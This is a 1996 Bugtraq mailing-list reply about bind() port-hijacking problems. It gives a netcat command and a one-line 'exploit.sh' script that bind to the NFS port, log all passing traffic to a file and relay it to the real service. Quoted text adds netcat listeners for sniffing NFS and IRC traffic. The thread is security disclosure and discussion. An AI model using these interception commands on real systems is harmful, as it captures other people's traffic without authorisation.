[2501] in bugtraq
Re: BoS: bind() Security Problems
daemon@ATHENA.MIT.EDU (invalid opcode)
Fri Feb 2 20:34:32 1996
Date: Thu, 1 Feb 1996 21:39:18 -0800
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: invalid opcode <coredump@nervosa.com>
X-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
In-Reply-To: <199601312126.OAA16107@crimelab.com>
Yes, but if you do this:
netcat -lvv -s 192.88.209.5 -p 2049 -e exploit.sh&
exploit.sh:
tee crap | netcat 192.88.209.5 2049
and than you can capture it all to the file: crap, and redirect it to the
original port.
Chris,
coredump@nervosa.com
On Thu, 1 Feb 1996, Darren Reed wrote:
> In some mail from Bernd Lehle, sie said:
> [...]
> > > Exploit:
> > [..]
> > > Run netcat:
> > >
> > > w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> > > listening on [192.88.209.5] 2049 ...
> >
> > To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667
>
> This won't get you messages between already connected clients and servers.
>
> Yes, you might be able to make clients connect, at first, to you and not
> a real server, but it is going to be obvious to the client: the connection
> won't complete as netcat won't generate the server replies which many
> clients now look for to indicate the confirmation of a connection.
>
